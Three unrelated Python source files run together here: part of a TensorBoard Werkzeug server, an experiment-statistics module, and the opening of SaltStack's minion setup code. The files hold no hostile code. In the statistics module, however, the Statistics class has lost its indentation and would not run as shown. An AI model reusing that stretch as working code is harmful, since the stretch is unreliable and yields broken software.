        raise NotImplementedError()

    @abstractmethod
    def get_url(self):
        """Returns a URL at which this server should be reachable."""
        raise NotImplementedError()
class TensorBoardServerException(Exception):
    """Exception raised by TensorBoardServer for user-friendly errors.

    Subclasses of TensorBoardServer can raise this exception in order to
    generate a clean error message for the user rather than a stacktrace.
    """
    def __init__(self, msg):
        # Forward to Exception so str(e) and e.args carry the message;
        # previously Exception.__init__ was never called and str(e) was ''.
        super(TensorBoardServerException, self).__init__(msg)
        self.msg = msg
class WerkzeugServer(serving.ThreadedWSGIServer, TensorBoardServer):
    """Implementation of TensorBoardServer using the Werkzeug dev server."""
    # ThreadedWSGIServer handles this in werkzeug 0.12+ but we allow 0.11.x.
    daemon_threads = True

    def __init__(self, wsgi_app, flags):
        self._flags = flags
        host = flags.host
        self._auto_wildcard = False
        if not host:
            # Without an explicit host, we default to serving on all interfaces,
            # and will attempt to serve both IPv4 and IPv6 traffic through one socket.
            host = self._get_wildcard_address(flags.port)
            self._auto_wildcard = True
        try:
            super(WerkzeugServer, self).__init__(host, flags.port, wsgi_app)
        except socket.error as e:
            # Translate common bind errors into user-friendly exceptions.
            if hasattr(errno, 'EACCES') and e.errno == errno.EACCES:
                raise TensorBoardServerException(
                    'TensorBoard must be run as superuser to bind to port %d' %
                    flags.port)
            elif hasattr(errno, 'EADDRINUSE') and e.errno == errno.EADDRINUSE:
                if flags.port == 0:
                    raise TensorBoardServerException(
                        'TensorBoard unable to find any open port')
                else:
                    raise TensorBoardServerException(
                        'TensorBoard could not bind to port %d, it was already in use' %
                        flags.port)
            elif hasattr(errno, 'EADDRNOTAVAIL') and e.errno == errno.EADDRNOTAVAIL:
                raise TensorBoardServerException(
                    'TensorBoard could not bind to unavailable address %s' % host)
            elif hasattr(errno, 'EAFNOSUPPORT') and e.errno == errno.EAFNOSUPPORT:
                raise TensorBoardServerException(
                    'Tensorboard could not bind to unsupported address family %s' %
                    host)
            # Raise the raw exception if it wasn't identifiable as a user error.
            raise

    def _get_wildcard_address(self, port):
        """Returns a wildcard address for the port in question.

        This will attempt to follow the best practice of calling getaddrinfo() with
        a null host and AI_PASSIVE to request a server-side socket wildcard address.
        If that succeeds, this returns the first IPv6 address found, or if none,
        then returns the first IPv4 address. If that fails, then this returns the
        hardcoded address "::" if socket.has_ipv6 is True, else "0.0.0.0".
        """
        fallback_address = '::' if socket.has_ipv6 else '0.0.0.0'
        if hasattr(socket, 'AI_PASSIVE'):
            try:
                addrinfos = socket.getaddrinfo(None, port, socket.AF_UNSPEC,
                                               socket.SOCK_STREAM, socket.IPPROTO_TCP,
                                               socket.AI_PASSIVE)
            except socket.gaierror as e:
                # FIX: logger.warn is deprecated in favor of logger.warning.
                logger.warning('Failed to auto-detect wildcard address, assuming %s: %s',
                               fallback_address, str(e))
                return fallback_address
            addrs_by_family = defaultdict(list)
            for family, _, _, _, sockaddr in addrinfos:
                # Format of the "sockaddr" socket address varies by address family,
                # but [0] is always the IP address portion.
                addrs_by_family[family].append(sockaddr[0])
            if hasattr(socket, 'AF_INET6') and addrs_by_family[socket.AF_INET6]:
                return addrs_by_family[socket.AF_INET6][0]
            if hasattr(socket, 'AF_INET') and addrs_by_family[socket.AF_INET]:
                return addrs_by_family[socket.AF_INET][0]
        logger.warning('Failed to auto-detect wildcard address, assuming %s',
                       fallback_address)
        return fallback_address

    def server_bind(self):
        """Override to enable IPV4 mapping for IPV6 sockets when desired.

        The main use case for this is so that when no host is specified, TensorBoard
        can listen on all interfaces for both IPv4 and IPv6 connections, rather than
        having to choose v4 or v6 and hope the browser didn't choose the other one.
        """
        socket_is_v6 = (
            hasattr(socket, 'AF_INET6') and self.socket.family == socket.AF_INET6)
        has_v6only_option = (
            hasattr(socket, 'IPPROTO_IPV6') and hasattr(socket, 'IPV6_V6ONLY'))
        if self._auto_wildcard and socket_is_v6 and has_v6only_option:
            try:
                self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
            except socket.error as e:
                # Log a warning on failure to dual-bind, except for EAFNOSUPPORT
                # since that's expected if IPv4 isn't supported at all (IPv6-only).
                if hasattr(errno, 'EAFNOSUPPORT') and e.errno != errno.EAFNOSUPPORT:
                    # FIX: this previously called module-level logging.warn(),
                    # which is deprecated and bypasses this module's logger.
                    logger.warning('Failed to dual-bind to IPv4 wildcard: %s', str(e))
        super(WerkzeugServer, self).server_bind()

    def handle_error(self, request, client_address):
        """Override to get rid of noisy EPIPE errors."""
        del request  # unused
        # Kludge to override a SocketServer.py method so we can get rid of noisy
        # EPIPE errors. They're kind of a red herring as far as errors go. For
        # example, `curl -N http://localhost:6006/ | head` will cause an EPIPE.
        exc_info = sys.exc_info()
        e = exc_info[1]
        if isinstance(e, IOError) and e.errno == errno.EPIPE:
            # FIX: use logger.warning with lazy %-args instead of deprecated
            # logger.warn with eager string interpolation.
            logger.warning('EPIPE caused by %s in HTTP serving', client_address)
        else:
            logger.error('HTTP serving error', exc_info=exc_info)

    def get_url(self):
        if self._auto_wildcard:
            display_host = socket.gethostname()
        else:
            host = self._flags.host
            # Bracket bare IPv6 literals so the URL is well-formed.
            display_host = (
                '[%s]' % host if ':' in host and not host.startswith('[') else host)
        return 'http://%s:%d%s' % (display_host, self.server_port,
                                   self._flags.path_prefix)
|
stats.py | import numpy as np
import os
import shelve
import sklearn.preprocessing as prep
from datetime import datetime
from threading import Thread
from enum import Enum
from queue import Queue
from ilp.constants import EPS_32, EPS_64, STATS_DIR
from ilp.helpers.log import make_logger
# File extension appended to persisted statistics shelve files.
STATS_FILE_EXT = '.stat'
class JobType(Enum):
    """Kinds of work items accepted by StatisticsWorker via its job queue."""
    # NOTE(review): values are sparse (1, 3, 6, 9, ...); presumably the gaps
    # belonged to removed job types -- confirm before renumbering.
    EVAL = 1
    ONLINE_ITER = 3
    PRINT_STATS = 6
    LABEL_STREAM = 9
    TRAIN_PRED = 11
    TEST_PRED = 12
    RUNTIME = 13
    POINT_PREDICTION = 14
logger = make_logger(__name__)
class StatisticsWorker:
    """
    Background worker that aggregates and persists experiment statistics.

    Parameters
    ----------
    config : dict
        Dictionary with configuration key-value pairs of the running experiment.

    path : str, optional
        File path to save the aggregated statistics (default=None).

    isave : int, optional
        The frequency of saving statistics (default=1).

    Attributes
    ----------
    _stats : Statistics
        Class to store different kinds of statistics during an experiment run.

    _jobs : Queue
        Queue of jobs to process in a different thread.

    _thread : Thread
        Thread in which to process incoming jobs.
    """

    def __init__(self, config, path=None, isave=1):
        if path is None:
            # Derive a unique default file name from timestamp + dataset.
            cur_time = datetime.now().strftime('%d%m%Y-%H%M%S')
            dataset_name = config['dataset']['name']
            filename = 'stats_' + cur_time + '_' + str(dataset_name) + STATS_FILE_EXT
            path = os.path.join(STATS_DIR, filename)
        elif not path.endswith(STATS_FILE_EXT):
            path = path + STATS_FILE_EXT

        os.makedirs(os.path.split(path)[0], exist_ok=True)
        self.path = path
        self.config = config
        self.isave = isave
        self._stats = Statistics()
        self._jobs = Queue()
        self._thread = Thread(target=self.work)
        # FIX: initialize here so save() cannot hit an AttributeError if it
        # runs before start(); start() still resets the counter per run.
        self.n_iter_eval = 0

    def start(self):
        """Reset the evaluation counter and launch the worker thread."""
        self.n_iter_eval = 0
        self._thread.start()

    def save(self):
        """Persist current statistics; keep the previous shelf until the
        new one is written, then delete it."""
        prev_file = self.path + '_iter_' + str(self.n_iter_eval)
        if os.path.exists(self.path):
            os.rename(self.path, prev_file)
        with shelve.open(self.path, 'c') as shelf:
            shelf['stats'] = self._stats.__dict__
            shelf['config'] = self.config
        if os.path.exists(prev_file):
            os.remove(prev_file)

    def stop(self):
        """Flush remaining jobs, join the worker thread and save."""
        self._jobs.put_nowait({'job_type': JobType.PRINT_STATS})
        # None is the sentinel that terminates the work() loop.
        self._jobs.put(None)
        self._thread.join()
        self.save()

    def send(self, d):
        """Enqueue a job dict (must contain a 'job_type' key) for processing."""
        self._jobs.put_nowait(d)

    def work(self):
        """Worker-thread loop: dispatch queued jobs until the None sentinel."""
        while True:
            job = self._jobs.get()
            if job is None:  # End of algorithm
                self._jobs.task_done()
                break
            job_type = job['job_type']
            if job_type == JobType.EVAL:
                self._stats.evaluate(job['y_est'], job['y_true'])
                self.n_iter_eval += 1
            elif job_type == JobType.LABEL_STREAM:
                self._stats.label_stream_true = job['y_true']
                self._stats.label_stream_mask_observed = job['mask_obs']
            elif job_type == JobType.POINT_PREDICTION:
                f = job['vec']
                h = self._stats.entropy(f)
                self._stats.entropy_point_after.append(h)
                y = job['y']
                self._stats.pred_point_after.append(y)
                self._stats.conf_point_after.append(f.max())
            elif job_type == JobType.ONLINE_ITER:
                self._stats.iter_online_count.append(job['n_in_iter'])
                self._stats.iter_online_duration.append(job['dt'])
            elif job_type == JobType.PRINT_STATS:
                err = self._stats.clf_error_mixed[-1] * 100
                logger.info('Classif. Error: {:5.2f}%\n\n'.format(err))
            elif job_type == JobType.TRAIN_PRED:
                self._stats.train_est = job['y_est']
            elif job_type == JobType.TEST_PRED:
                y_pred_knn = job['y_pred_knn']
                self._stats.test_pred_knn.append(y_pred_knn)
                y_pred_lp = job['y_pred_lp']
                self._stats.test_pred_lp.append(y_pred_lp)
                self._stats.test_true = y_test = job['y_true']
                err_knn = np.mean(np.not_equal(y_pred_knn, y_test))
                err_lp = np.mean(np.not_equal(y_pred_lp, y_test))
                logger.info('knn test err: {:5.2f}%'.format(err_knn*100))
                logger.info('ILP test err: {:5.2f}%'.format(err_lp*100))
                self._stats.test_error_knn.append(err_knn)
                self._stats.test_error_ilp.append(err_lp)
            elif job_type == JobType.RUNTIME:
                self._stats.runtime = job['t']
            # Periodic checkpoint every `isave` evaluations.
            if self.n_iter_eval % self.isave == 0:
                self.save()
            self._jobs.task_done()
# Statistics attributes that are not per-iteration metric curves (ground
# truth, raw predictions, runtime scalars). NOTE(review): the name suggests
# consumers skip these when aggregating/plotting metrics; the consumer is
# not visible in this file -- confirm.
EXCLUDED_METRICS = {'label_stream_true',
                    'label_stream_mask_observed',
                    'n_burn_in',
                    'test_pred_knn', 'test_pred_lp', 'test_true',
                    'train_est', 'runtime',
                    'conf_point_after', 'test_error_knn', 'test_error_ilp'}
class Statistics:
"""
Statistics gathered during learning (training and testing).
"""
def __init__(self):
    # Per-iteration bookkeeping for the online algorithm.
    self.iter_online_count = []
    self.iter_online_duration = []
    # Evaluation after a new point arrives
    self.n_invalid_samples = []
    self.invalid_samples_ratio = []
    self.clf_error_mixed = []
    self.clf_error_valid = []
    self.l1_error_mixed = []
    self.l1_error_valid = []
    self.cross_ent_mixed = []
    self.cross_ent_valid = []
    self.entropy_pred_mixed = []
    self.entropy_pred_valid = []
    # Defined once
    self.label_stream_true = []
    self.label_stream_mask_observed = []
    self.test_pred_knn = []
    self.test_pred_lp = []
    self.test_true = []
    self.train_est = []
    # Total wall-clock time; NaN until a RUNTIME job reports it.
    self.runtime = np.nan
    self.test_error_ilp = []
    self.test_error_knn = []
    # Per-point diagnostics recorded right after each prediction.
    self.entropy_point_after = []
    self.pred_point_after = []
    self.conf_point_after = []
def evaluate(self, y_predictions, y_true):
"""Computes statistics for a given set of predictions and the ground truth.
Args:
y_predictions (array_like): [u_samples, n_classes] soft class predictions for current unlabeled samples
y_true (array_like): [u_samples, n_classes] one-hot encoding of the true classes_ of the unlabeled samples
eps (float): quantity slightly larger than zero to avoid division by zero
Returns:
float, average accuracy
"""
u_samples, n_classes = y_predictions.shape
# Clip predictions to [0,1]
eps = EPS_32 if y_predictions.itemsize == 4 else EPS_64
y_pred_01 = np.clip(y_predictions, eps, 1-eps)
# Normalize predictions to make them proper distributions
y_pred = prep.normalize(y_pred_01, copy=False, norm='l1')
# 0-1 Classification error under valid and invalid points
y_pred_max = np.argmax(y_pred, axis=1)
y_true_max = np.argmax(y_true, axis=1)
fc_err_mixed = self.zero_one_loss(y_pred_max, y_true_max)
self.clf_error_mixed.append(fc_err_mixed)
# L1 error under valid and invalid points
l1_err_mixed = np.mean(self.l1_error(y_pred, y_true))
self.l1_error_mixed.append(l1_err_mixed)
# Cross-entropy loss
crossent_mixed = np.mean(self.cross_entropy(y_true, y_pred))
self.cross_ent_mixed.append(crossent_mixed)
# Identify valid points (for which a label has been estimated)
ind_valid, = np.where(y_pred.sum(axis=1) != 0)
n_valid = len(ind_valid)
n_invalid = u_samples - n_valid
self.n_invalid_samples.append(n_invalid)
self.invalid_samples_ratio.append(n_invalid / u_samples)
# Entropy of the predictions
if n_invalid == 0:
entropy_pred_mixed = np.mean(self.entropy(y_pred))
self.entropy_pred_mixed.append(entropy_pred_mixed)
return
y_pred_valid = y_pred[ind_valid]
y_true_valid = y_true[ind_valid]
# 0-1 Classification error under valid points only
y_pred_valid_max = y_pred_max[ind_valid]
y_true_valid_max = y_true_max[ind_valid]
err_valid_max = self.zero_one_loss(y_pred_valid_max, y_true_valid_max)
self.clf_error_valid.append(err_valid_max)
# L1 error under valid points only
l1_err_valid = np.mean(self.l1_error(y_pred_valid, y_true_valid))
self.l1_error_valid.append(l1_err_valid)
# Cross-entropy loss
ce_valid = np.mean(self.cross_entropy(y_true_valid, y_pred_valid))
self.cross_ent_valid.append(ce_valid)
# Entropy of the predictions
entropy_pred_valid = np.mean(self.entropy(y_pred_valid))
self.entropy_pred_valid.append(entropy_pred_valid)
n_total = n_valid + n_invalid
entropy_pred_mixed = (entropy_pred_valid*n_valid + n_invalid) / n_total
self.entropy_pred_mixed.append(entropy_pred_mixed)
@staticmethod
def zero_one_loss(y_pred, y_true, average=True):
"""
Args:
y_pred (array_like): (n_samples, n_classes)
y_true (array_like): (n_samples, n_classes)
average (bool): Whether to take the average over all predictions.
Returns: The absolute difference for each row.
Note that this will be in [0,2] for p.d.f.s.
"""
if average:
return np.mean(np.not_equal(y_pred, y_true))
else:
return np.sum(np.not_equal(y_pred, y_true))
@staticmethod
def l1_error(y_pred, y_true, norm=True):
"""
Args:
y_pred (array_like): An array of probability distributions (usually predictions) with shape (n_distros, n_classes)
y_true (array_like): An array of probability distributions (usually groundtruth) with shape (n_distros, n_classes)
norm (bool): Whether to constrain the L1 error to be in [0,1].
Returns: The absolute difference for each row. Note that this will be in [0,2] for pdfs.
"""
l1_error = np.abs(y_pred - y_true).sum(axis=1)
if norm:
l1_error /= 2
return l1_error
@staticmethod
def entropy(p, norm=True):
"""
Args:
p (array_like): An array of probability distributions with shape (n_distros, n_classes)
norm (bool): Whether to normalize the entropy to constrain it in [0,1]
Returns: An array of entropies of the distributions with shape (n_distros,)
"""
entropy = - (p * np.log(p)).sum(axis=1)
if norm:
entropy /= np.log(p.shape[1])
return entropy
@staticmethod
def cross_entropy(p, q, norm=True):
"""
Args:
p (array_like): An array of probability distributions (usually groundtruth) with shape (n_distros, n_classes)
q (array_like): An array of probability distributions (usually predictions) with shape (n_distros, n_classes)
norm (bool): Whether to normalize the entropy to constrain it in [0,1]
Returns: An array of cross entropies between the groundtruth and the prediction with shape (n_distros,)
"""
cross_ent = -(p * np.log(q)).sum(axis=1)
if norm:
cross_ent /= np.log(p.shape[1])
return cross_ent
def aggregate_statistics(stats_path, metrics=None, excluded_metrics=None):
    """
    Aggregate statistics shelves from a single file or a directory of files.

    Computes the element-wise mean and standard deviation of every
    non-excluded metric across runs and echoes a short summary. Excluded
    metrics are copied over verbatim instead of averaged.

    Args:
        stats_path: A stats file, or a directory containing stats files.
        metrics: Metric names to aggregate; defaults to all attributes of a
            fresh ``Statistics`` instance.
        excluded_metrics: Names to skip; defaults to ``EXCLUDED_METRICS``.

    Returns:
        Tuple (mean dict, std dict or None for a single run, config dict).
    """
    print('Aggregating statistics from {}'.format(stats_path))
    # A path ending in the stats extension is a single run; otherwise scan
    # the directory for every matching file.
    if stats_path.endswith(STATS_FILE_EXT):
        list_of_files = [stats_path]
    else:
        list_of_files = [os.path.join(stats_path, name)
                         for name in os.listdir(stats_path)
                         if name.endswith(STATS_FILE_EXT)]
    stats_runs, random_states = [], []
    for run_file in list_of_files:
        with shelve.open(run_file, 'r') as db:
            stats_runs.append(db['stats'])
            random_states.append(db['config']['options']['random_state'])
    print('\nRandom seeds used: {}\n'.format(random_states))
    if metrics is None:
        metrics = Statistics().__dict__.keys()
    if excluded_metrics is None:
        excluded_metrics = EXCLUDED_METRICS
    stats_mean = {}
    stats_std = {}
    first_run = stats_runs[0]
    for metric in metrics:
        if metric in excluded_metrics:
            continue
        if metric not in first_run:
            print('\nMetric {} not found!'.format(metric))
            continue
        # Stack the per-run series into a 2D array before averaging.
        metric_runs = np.asarray([run[metric] for run in stats_runs])
        if metric_runs.ndim < 2:
            print('No values for metric, skipping.')
            continue
        stats_mean[metric] = np.mean(metric_runs, axis=0)
        stats_std[metric] = np.std(metric_runs, axis=0)
    # The configuration of the first run stands in for all of them.
    with shelve.open(list_of_files[0], 'r') as db:
        config = db['config']
    # Echo a short timing/error summary.
    lp_times = stats_mean['iter_online_duration']
    ice = stats_mean['clf_error_mixed'][0] * 100
    fce = stats_mean['clf_error_mixed'][-1] * 100
    print('Avg. LP time/iter: {:.4f}s'.format(np.mean(lp_times)))
    print('Initial classification error: {:.2f}%'.format(ice))
    print('Final classification error: {:.2f}%'.format(fce))
    # Add excluded metrics in the end (later runs overwrite earlier ones).
    for run in stats_runs:
        for ex_metric in excluded_metrics:
            if ex_metric in run:
                print('Appending excluded metric: {}'.format(ex_metric))
                stats_mean[ex_metric] = run[ex_metric]
    if len(list_of_files) == 1:
        stats_std = None
    return stats_mean, stats_std, config
|
minion.py | # -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement, unicode_literals
import functools
import os
import sys
import copy
import time
import types
import signal
import random
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
import salt.serializers.msgpack
from binascii import crc32
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
from salt._compat import ipaddress
from salt.utils.network import parse_host_port
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
import salt.transport.client
import salt.defaults.exitcodes
from salt.utils.ctx import RequestContext
# pylint: enable=no-name-in-module,redefined-builtin
import tornado
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
try:
import salt.utils.win_functions
HAS_WIN_FUNCTIONS = True
except ImportError:
HAS_WIN_FUNCTIONS = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.pillar
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import salt.defaults.events
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
import salt.utils.dictupdate
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
SaltMasterUnresolvableError
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
    '''
    Resolves the master_ip and master_uri options

    :param opts: the minion configuration dictionary; reads master,
        master_port, ipv6, retry_dns, retry_dns_count and the
        source_* options.
    :param fallback: when DNS resolution fails and retry_dns is disabled,
        fall back to 127.0.0.1 instead of re-raising SaltClientError.
    :return: dict with at least ``master_uri``, usually ``master_ip``, and
        optionally ``source_ip``, ``source_ret_port``, ``source_publish_port``.
    '''
    ret = {}
    check_dns = True
    # Masterless (local file_client) minions skip DNS resolution entirely.
    if (opts.get('file_client', 'remote') == 'local' and
            not opts.get('use_master_when_local', False)):
        check_dns = False
    # Since salt.log is imported below, salt.utils.network needs to be imported here as well
    import salt.utils.network

    if check_dns is True:
        try:
            # An empty master is treated as unresolvable (handled below).
            if opts['master'] == '':
                raise SaltSystemExit
            ret['master_ip'] = salt.utils.network.dns_check(
                opts['master'],
                int(opts['master_port']),
                True,
                opts['ipv6'],
                attempt_connect=False)
        except SaltClientError:
            retry_dns_count = opts.get('retry_dns_count', None)
            if opts['retry_dns']:
                # Keep retrying; a bounded retry_dns_count turns the loop
                # into a hard failure once exhausted.
                while True:
                    if retry_dns_count is not None:
                        if retry_dns_count == 0:
                            raise SaltMasterUnresolvableError
                        retry_dns_count -= 1
                    import salt.log
                    msg = ('Master hostname: \'{0}\' not found or not responsive. '
                           'Retrying in {1} seconds').format(opts['master'], opts['retry_dns'])
                    # Only log when a console handler exists; otherwise print
                    # so early startup failures are still visible.
                    if salt.log.setup.is_console_configured():
                        log.error(msg)
                    else:
                        print('WARNING: {0}'.format(msg))
                    time.sleep(opts['retry_dns'])
                    try:
                        ret['master_ip'] = salt.utils.network.dns_check(
                            opts['master'],
                            int(opts['master_port']),
                            True,
                            opts['ipv6'],
                            attempt_connect=False)
                        break
                    except SaltClientError:
                        # Resolution failed again; loop and retry.
                        pass
            else:
                if fallback:
                    ret['master_ip'] = '127.0.0.1'
                else:
                    raise
        except SaltSystemExit:
            # Unresolvable/empty master: report and exit with code 42.
            unknown_str = 'unknown address'
            master = opts.get('master', unknown_str)
            if master == '':
                master = unknown_str
            if opts.get('__role') == 'syndic':
                err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
                      'Set \'syndic_master\' value in minion config.'.format(master)
            else:
                err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
                      'Set \'master\' value in minion config.'.format(master)
            log.error(err)
            raise SaltSystemExit(code=42, msg=err)
    else:
        ret['master_ip'] = '127.0.0.1'

    if 'master_ip' in ret and 'master_ip' in opts:
        if ret['master_ip'] != opts['master_ip']:
            log.warning(
                'Master ip address changed from %s to %s',
                opts['master_ip'], ret['master_ip']
            )
    # Optionally pin the outgoing connection to a specific interface or
    # source address/ports.
    if opts['source_interface_name']:
        log.trace('Custom source interface required: %s', opts['source_interface_name'])
        interfaces = salt.utils.network.interfaces()
        log.trace('The following interfaces are available on this Minion:')
        log.trace(interfaces)
        if opts['source_interface_name'] in interfaces:
            if interfaces[opts['source_interface_name']]['up']:
                addrs = interfaces[opts['source_interface_name']]['inet'] if not opts['ipv6'] else\
                        interfaces[opts['source_interface_name']]['inet6']
                ret['source_ip'] = addrs[0]['address']
                log.debug('Using %s as source IP address', ret['source_ip'])
            else:
                log.warning('The interface %s is down so it cannot be used as source to connect to the Master',
                            opts['source_interface_name'])
        else:
            log.warning('%s is not a valid interface. Ignoring.', opts['source_interface_name'])
    elif opts['source_address']:
        ret['source_ip'] = salt.utils.network.dns_check(
            opts['source_address'],
            int(opts['source_ret_port']),
            True,
            opts['ipv6'],
            attempt_connect=False)
        log.debug('Using %s as source IP address', ret['source_ip'])
    if opts['source_ret_port']:
        ret['source_ret_port'] = int(opts['source_ret_port'])
        log.debug('Using %d as source port for the ret server', ret['source_ret_port'])
    if opts['source_publish_port']:
        ret['source_publish_port'] = int(opts['source_publish_port'])
        log.debug('Using %d as source port for the master pub', ret['source_publish_port'])
    ret['master_uri'] = 'tcp://{ip}:{port}'.format(
        ip=ret['master_ip'], port=opts['master_port'])
    log.debug('Master URI: %s', ret['master_uri'])

    return ret
def prep_ip_port(opts):
    '''
    parse host:port values from opts['master'] and return valid:
        master: ip address or hostname as a string
        master_port: (optional) master returner port as integer

    e.g.:
      - master: 'localhost:1234' -> {'master': 'localhost', 'master_port': 1234}
      - master: '127.0.0.1:1234' -> {'master': '127.0.0.1', 'master_port' :1234}
      - master: '[::1]:1234' -> {'master': '::1', 'master_port': 1234}
      - master: 'fe80::a00:27ff:fedc:ba98' -> {'master': 'fe80::a00:27ff:fedc:ba98'}
    '''
    # "ip_only" means the master value is a bare IP address: validate it and
    # hand back the parsed address without any port handling. The is_ipv6
    # style bracket notation ('[::1]:1234') is handled by the parser below.
    if opts['master_uri_format'] == 'ip_only':
        return {'master': ipaddress.ip_address(opts['master'])}

    host, port = parse_host_port(opts['master'])
    parsed = {'master': host}
    if port:
        parsed['master_port'] = port
    return parsed
def get_proc_dir(cachedir, **kwargs):
    '''
    Given the cache directory, return the directory that process data is
    stored in, creating it if it doesn't exist.

    The following optional Keyword Arguments are handled:

    mode: anything os.makedirs accepts as mode; also enforced via os.chmod
          if the directory already exists with different permission bits.

    uid:  the uid to set; None or -1 leaves ownership untouched, as does a
          directory already owned by this uid. Must be int. Unix only.

    gid:  the gid to set; same semantics as uid. Unix only.
    '''
    proc_dir = os.path.join(cachedir, 'proc')
    requested_mode = kwargs.pop('mode', None)
    mode_kwargs = {} if requested_mode is None else {'mode': requested_mode}

    if not os.path.isdir(proc_dir):
        # proc dir is missing: create it, honoring an explicit mode if given.
        os.makedirs(proc_dir, **mode_kwargs)

    dir_stat = os.stat(proc_dir)

    if mode_kwargs:
        # An explicit mode was requested -- reconcile the existing bits.
        current_bits = S_IMODE(dir_stat.st_mode)
        if current_bits != mode_kwargs['mode']:
            # Clear the current permission bits, then apply the requested ones
            os.chmod(proc_dir, (dir_stat.st_mode ^ current_bits) | mode_kwargs['mode'])

    if hasattr(os, 'chown'):
        # Ownership changes are only possible on unix/unix-like systems.
        uid = kwargs.pop('uid', -1)
        gid = kwargs.pop('gid', -1)
        # Skip the chown entirely when both ids are -1 (no change requested)
        # or when the directory already has the requested ownership.
        wants_change = any(ident != -1 for ident in (uid, gid))
        if wants_change and (dir_stat.st_uid != uid or dir_stat.st_gid != gid):
            os.chown(proc_dir, uid, gid)

    return proc_dir
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
    '''
    Detect the args and kwargs that need to be passed to a function call, and
    check them against what was passed.

    :param func: the callable whose argspec the arguments are checked against
    :param args: the raw argument list from the publish; dict entries flagged
        with ``__kwarg__`` and ``key=value`` strings become keyword arguments
    :param data: publish data; when func accepts **kwargs, each entry is
        injected as a ``__pub_<key>`` keyword argument
    :param ignore_invalid: when False, raise via
        salt.utils.args.invalid_kwargs on keywords func cannot accept
    :return: tuple (positional args list, keyword args dict)
    '''
    argspec = salt.utils.args.get_function_argspec(func)
    _args = []
    _kwargs = {}
    invalid_kwargs = []

    for arg in args:
        if isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
            # if the arg is a dict with __kwarg__ == True, then its a kwarg
            for key, val in six.iteritems(arg):
                if argspec.keywords or key in argspec.args:
                    # Function supports **kwargs or is a positional argument to
                    # the function.
                    _kwargs[key] = val
                else:
                    # **kwargs not in argspec and parsed argument name not in
                    # list of positional arguments. This keyword argument is
                    # invalid.
                    invalid_kwargs.append('{0}={1}'.format(key, val))
            continue

        else:
            # string arg: may be a "key=value" keyword in string form
            string_kwarg = salt.utils.args.parse_input([arg], condition=False)[1]  # pylint: disable=W0632
            if string_kwarg:
                if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
                    # Function supports **kwargs or is a positional argument to
                    # the function.
                    _kwargs.update(string_kwarg)
                else:
                    # **kwargs not in argspec and parsed argument name not in
                    # list of positional arguments. This keyword argument is
                    # invalid.
                    for key, val in six.iteritems(string_kwarg):
                        invalid_kwargs.append('{0}={1}'.format(key, val))
            else:
                _args.append(arg)

    if invalid_kwargs and not ignore_invalid:
        salt.utils.args.invalid_kwargs(invalid_kwargs)

    if argspec.keywords and isinstance(data, dict):
        # this function accepts **kwargs, pack in the publish data
        for key, val in six.iteritems(data):
            _kwargs['__pub_{0}'.format(key)] = val

    return _args, _kwargs
def eval_master_func(opts):
    '''
    Evaluate master function if master type is 'func'
    and save it result in opts['master']

    The ``__master_func_evaluated`` flag in opts ensures the module function
    is only called once. On load or type failure the process exits with
    EX_GENERIC.
    '''
    if '__master_func_evaluated' not in opts:
        # split module and function and try loading the module
        mod_fun = opts['master']
        mod, fun = mod_fun.split('.')
        try:
            master_mod = salt.loader.raw_mod(opts, mod, fun)
            if not master_mod:
                # raising KeyError routes "module not found" into the same
                # error handling as a missing function key below
                raise KeyError
            # we take whatever the module returns as master address
            opts['master'] = master_mod[mod_fun]()
            # Check for valid types
            if not isinstance(opts['master'], (six.string_types, list)):
                raise TypeError
            opts['__master_func_evaluated'] = True
        except KeyError:
            log.error('Failed to load module %s', mod_fun)
            sys.exit(salt.defaults.exitcodes.EX_GENERIC)
        except TypeError:
            log.error('%s returned from %s is not a string', opts['master'], mod_fun)
            sys.exit(salt.defaults.exitcodes.EX_GENERIC)
        log.info('Evaluated master from module: %s', mod_fun)
def master_event(type, master=None):
    '''
    Centralized master event function which will return event type based on event_map

    type -- one of 'connected', 'disconnected', 'failback' or 'alive'
    master -- optional master id; only 'alive' tags carry it as a suffix
    '''
    event_map = {'connected': '__master_connected',
                 'disconnected': '__master_disconnected',
                 'failback': '__master_failback',
                 'alive': '__master_alive'}
    tag = event_map.get(type, None)
    # 'alive' events are fired per master, so the master id is appended.
